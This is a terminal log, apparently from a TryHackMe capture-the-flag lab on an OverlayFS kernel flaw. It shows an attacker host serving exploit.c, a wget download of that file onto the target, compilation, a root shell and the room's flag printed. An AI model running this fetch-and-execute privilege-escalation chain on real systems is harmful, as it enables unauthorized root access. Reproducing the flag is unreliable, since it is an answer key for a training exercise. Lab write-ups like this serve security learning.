# https://tryhackme.com/room/overlayfs

┌──────────────────────────────────────────────────────────────┐
│   ______                          ____          _         __ │
│  / ____/_____ ___   ___   ____   / __ \ ____   (_)____   / /_│
│ / / __ / ___// _ \ / _ \ / __ \ / /_/ // __ \ / // __ \ / __/│
│/ /_/ // /   /  __//  __// / / // ____// /_/ // // / / // /_  │
│\____//_/    \___/ \___//_/ /_//_/     \____//_//_/ /_/ \__/  │
│                                                              │
└──────────────────────────────────────────────────────────────┘
┌──(kali㉿kali)-[~]
└─$ Documents/Vulnerabilities/OverlayFS           
                                                                                                                  
┌──(kali㉿kali)-[~/Documents/Vulnerabilities/OverlayFS]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.83.174 - - [19/Dec/2021 13:01:06] "GET /exploit HTTP/1.1" 200 -


┌──────────────────────────────────────────────────────────────┐
│   ______                          ____          _         __ │
│  / ____/_____ ___   ___   ____   / __ \ ____   (_)____   / /_│
│ / / __ / ___// _ \ / _ \ / __ \ / /_/ // __ \ / // __ \ / __/│
│/ /_/ // /   /  __//  __// / / // ____// /_/ // // / / // /_  │
│\____//_/    \___/ \___//_/ /_//_/     \____//_//_/ /_/ \__/  │s
│                                                              │
└──────────────────────────────────────────────────────────────┘
┌──(kali㉿kali)-[~]
└─$ ssh overlay@10.10.83.174
The authenticity of host '10.10.83.174 (10.10.83.174)' can't be established.
ED25519 key fingerprint is SHA256:j0yVVO9IZp52ZWmxfvn5DZjhQLeBMXtKxz+V1/lHaHk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.83.174' (ED25519) to the list of known hosts.
overlay@10.10.83.174's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Sun Dec 19 09:57:54 2021 from 10.100.2.203
overlay@overlayfs:~$ wget http://10.6.121.137:8000/exploit.c
--2021-12-19 10:04:40--  http://10.6.121.137:8000/exploit.c
Connecting to 10.6.121.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3560 (3.5K) [text/x-csrc]
Saving to: ‘exploit.c’

exploit.c                    100%[============================================>]   3.48K  --.-KB/s    in 0.003s  

2021-12-19 10:04:41 (1.14 MB/s) - ‘exploit.c’ saved [3560/3560]

overlay@overlayfs:~$ gcc -o exploit exploit.c
overlay@overlayfs:~$ ./exploit 
bash-4.4# whoami
root
bash-4.4# id
uid=0(root) gid=0(root) groups=0(root),1001(overlay)
bash-4.4# pwd
/home/overlay
bash-4.4# ls -l /root
total 4
-rw-r--r-- 1 root root 38 Apr 22  2021 flag.txt
bash-4.4# cat /root/flag.txt
thm{27aaa5865a52dcd4cb04c0e0a2d39404}

